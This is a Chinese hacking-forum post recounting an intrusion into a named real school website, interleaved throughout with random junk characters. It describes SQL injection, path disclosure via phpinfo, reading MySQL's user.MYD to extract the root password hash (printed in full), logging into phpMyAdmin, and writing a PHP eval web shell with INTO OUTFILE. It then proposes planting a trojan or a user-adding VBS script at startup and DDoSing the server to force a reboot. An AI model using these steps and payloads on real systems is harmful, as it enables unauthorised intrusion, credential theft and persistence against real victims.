第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
3 d7 \1 I5 a7 U: _ S发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!) i8 d: x* G+ \) V. e
* N7 }; s5 D0 c) P
. Z0 ^5 z/ K: ]; @
1 Y, K0 `7 V7 S8 J9 Y. `/ n4 {4 M常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
; ~8 P! b4 P7 w/ R! O7 }# O6 [+ O- q! ]% x! X
那么想可以直接写入shell ,getshell有几个条件:8 \8 w2 q3 y) P
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
- d* J7 g+ V2 _+ h- M1 L }3 t4 m/ ? J7 W6 T3 T
试着爆绝对路径:
* O- J' ?! M5 q' M4 E( u$ l1 F1./phpMyAdmin/index.php?lang[]=1 + K% Z7 ]3 [2 a7 F0 e# Y- F
2./phpMyAdmin/phpinfo.php 3 V0 }+ ]2 N x% \1 o6 w, }
3./load_file() # k5 ^. p: O$ {/ Y
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
M$ i7 V4 A) d& r3 f- t3 E; M/ @; x" G5./phpmyadmin/libraries/select_lang.lib.php
# Y: S4 T4 V/ O; z' X6./phpmyadmin/libraries/lect_lang.lib.php
' h7 `5 l9 m( s! a# H7./phpmyadmin/libraries/mcrypt.lib.php # d5 i, d" s6 c, K3 [* T
8./phpmyadmin/libraries/export/xls.php , F/ @" n- V. |
3 B+ [9 [: n% c* M. K% @3 A均不行........................... ; H3 c" _7 R) |; _
5 D1 ^! ?' K {# L2 Z$ m) ^御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php - O7 B; _- e! m" X- I
i0 q9 [2 N3 c6 D( Y/ `权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
% F5 H5 ~$ }- a: F7 Y- A5 P4 c6 V2 l6 U7 t' o
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
, j6 }, _8 s8 Z. N( N3 i' T' {( U8 E- @% R( J3 e0 T/ X( |- V
敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
3 ^. m9 A) I, H" X! x7 V# ^8 { ]; a" L" f. w/ Y
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell : r/ \1 L$ b; v; A% F) b7 ~# {
% i E$ F/ j) f! O3 _' K5 o6 K$ e
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini ' k9 }. W' r5 E' A* B
" |4 F3 }! G& r7 M4 L% A) z7 p
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
" ]$ D' q! {$ H9 @% y) \6 I' d. b- {" _- _! |3 ^4 q1 W
成功读到root密码:
: L# q6 \- w o) y9 P$ {& ?
* @( a( u: m! ?' M+ r17---- r(0072)
7 D0 y2 m! k; ~ z) J% P7 m6 c18---- o(006f) ! i9 g- z, I4 v* c
19---- o(006f)
- Y3 T( j2 G% j7 r5 y! O. W+ |20---- t(0074) ) K: g; s) I2 U! r
21---- *(002a) % m; q0 x9 O7 v+ K- ?6 [) n
22---- 8(0038) + f( n. |4 X1 _# T' p$ Q) N
23---- 2(0032)
9 i) O! a' @3 ~5 U3 ]24---- E(0045)
4 U \. _/ V0 N, ^, R( k; O25---- 1(0031) 5 H8 h$ D D; O) P# f: S0 X+ F
26---- C(0043) + g. A5 ?- ]9 }9 A
27---- 5(0035)
0 M3 \, A0 |5 S! [. t4 q7 \28---- 8(0038) , N8 s3 G! _9 W" r/ X
29---- 2(0032) 8 @" N/ W' r% d7 d. J$ Q
30---- 8(0038) , [: @; w- B* I7 \, S
31---- A(0041)
- H2 [3 s8 E( m. J32---- 9(0039) 0 i* U- T) z& g, i6 D
33---- B(0042) + f% g3 ]3 T! x! V3 C/ U* K# `% S
34---- 5(0035)
, u( ~, ?+ w# m2 ]% K( ]7 U( j35---- 4(0034) * l) ]$ x9 Q) _) O/ g7 T
36---- 8(0038)
0 h, E# L0 J& H* W. X- y6 f37---- 6(0036) ' d% p- i, x; r) d
38---- 4(0034)
) @, S9 F. A p" m) ^# I39---- 9(0039) 2 i! S8 e% @ p( _
40---- 1(0031)
: G( k. V. B& q2 c2 A41---- 1(0031)
7 J9 q u9 B Y: R2 \42---- 5(0035)
5 y/ A' T# R9 _0 ~5 ?1 a8 o43---- 3(0033) 1 G4 I( S/ a) j$ J
44---- 5(0035) * R% ^5 t9 P6 A/ ~, w
45---- 9(0039) 3 S% I" q) R3 Z
46---- 8(0038) ) j4 a7 ~2 Z, D1 D7 d8 r
47---- F(0046)
6 r9 W' o& u! E" h48---- F(0046) 7 A( D/ e0 Y ]: M( o& Y
49---- 4(0034)
6 v( D9 e* [7 o1 } V' y, }50---- F(0046)
5 S I0 b/ j# }) g: l3 u* `) n51---- 0(0030) + ^8 F0 k' w1 O) C P
52---- 3(0033) - N$ O8 K# b! p3 B) ~
53---- 2(0032)
: y! h+ s9 X C+ Q% v; x0 O! h54---- A(0041) 7 e% m2 ^$ \6 B, a& D# G
55---- 4(0034) $ `7 C8 {# K( z# p" ~1 n
56---- A(0041)
+ o# M' k8 C3 \1 m# u57---- B(0042)
+ `6 b& @( i- D0 k0 I8 ~58---- *(0044) : F: ?6 V% o; V* ?7 S' k' |
59---- *(0035) % v R. a4 U m9 o D1 b! I
60---- *(0041)
' B' R* t- f f- d3 }$ J# v' I61---- *0032)
, v* a9 K! X& A& Z9 B) M
1 o( r3 o7 |$ p3 R解密后成功登陆phpmyamin 7 k9 w4 o# g0 G9 w9 k# l
. f. @" A4 Y7 D7 v$ j6 ?0 r
5 ?8 H: c2 c* g1 n, g% {4 h # i, x* t3 K3 [
# F9 O6 n. g) @找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
3 c8 o7 o) U/ T* h3 z" D9 Y- x; G! M, {" E8 Y9 ]
成功执行,拿下shell,菜刀连接: 6 L8 X, \0 n: |1 |$ ^
; S3 r3 U+ P" G6 \, N1 a/ k服务器不支持asp,aspx,php提权无果................... ( y8 v7 f8 l9 g" V$ B
4 f7 |+ a; h- x0 W! t
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: 2 N3 @) R/ Z3 ?% i1 G. t; E
服务器上已经有个隐藏帐号了 7 p3 ?) [ I, E6 i
别名 administrators
+ L6 O- f* p- f5 D# y注释 管理员对计算机/域有不受限制的完全访问权 7 W4 ?) |! u' F: B8 \+ b
成员
; A0 N4 N l4 H5 |! J-------------------------------------------------------------------------------$ [8 M( F/ O0 y" a7 }6 V. {
admin
6 @. y. F- H* LAdministrator
- o2 N2 \; _' V8 Fslipper$
% h5 T$ F7 |3 Q# W# \sqluser
8 c$ i* y( A2 \7 ~8 c# A8 f' y命令成功完成。
4 s, S& |$ H5 C5 t: j7 ]. V0 l n. H+ q9 ?# o1 A' g
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。* w- J' K w7 @( k
+ z' }% G g$ U0 O1 vddos服务器重启,不然就只能坐等服务器重启了...............................( t6 ?. T$ A5 z# ^0 a0 T; c
0 Z3 U- _$ Y( k& n' j! }
. z6 ~/ A0 @% T; B | 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
